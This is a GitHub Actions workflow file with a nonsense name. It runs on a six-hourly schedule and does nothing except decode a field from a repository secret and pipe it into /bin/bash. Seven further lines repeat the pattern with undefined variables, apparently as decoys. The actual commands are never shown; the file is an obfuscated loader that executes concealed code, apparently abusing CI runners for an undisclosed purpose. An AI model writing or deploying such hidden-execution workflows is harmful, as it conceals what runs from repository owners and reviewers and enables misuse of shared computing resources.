name: drawingmisnomer

on:
  workflow_dispatch:
  schedule:
    - cron: '48 2/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: drawingmisnomer
        env:
          ske1: ${{ secrets.ske1 }}
        run: |
          echo $ske1 | jq -r .ji3 | /bin/bash
          echo $x84 | jq -r .ur352 | /bin/bash
          echo $amh5706 | jq -r .ginkg88785 | /bin/bash
          echo $whosm58 | jq -r .khezx369 | /bin/bash
          echo $jr9 | jq -r .ni52 | /bin/bash
          echo $z88 | jq -r .vgmi44 | /bin/bash
          echo $ywbl4428 | jq -r .abip0526 | /bin/bash
          echo $f10823 | jq -r .i84491 | /bin/bash

